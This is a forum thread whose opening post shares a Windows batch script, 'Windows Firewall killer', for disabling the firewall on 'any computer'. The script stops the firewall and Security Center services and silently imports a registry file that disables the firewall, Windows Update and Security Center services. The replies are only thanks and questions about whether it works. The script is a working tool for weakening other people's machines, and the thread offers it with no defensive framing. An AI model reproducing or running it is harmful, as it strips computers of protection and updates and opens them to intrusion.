![]() |
Windows Firewall killer
Salam If you really wanna kill windows firewall of any computer so here is the code. This will disable windows firewall, Just copy this code to notepad and save it as fw.bat Here is the code: @echo off net stop "Security Center" net stop SharedAccess > "%Temp%.\kill.reg" ECHO REGEDIT4 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.\kill.reg" DEL "%Temp%.\kill.reg" |
thanks for sharing informative threads
|
Does it Really work ?
|
havent try yet.
|
hmm Thanks you both..
|
Quote:
|
nice
|
lt me see
|
Thanks FajaaN
|
Quote:
|
All times are GMT +5. The time now is 08:02 PM. |
Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.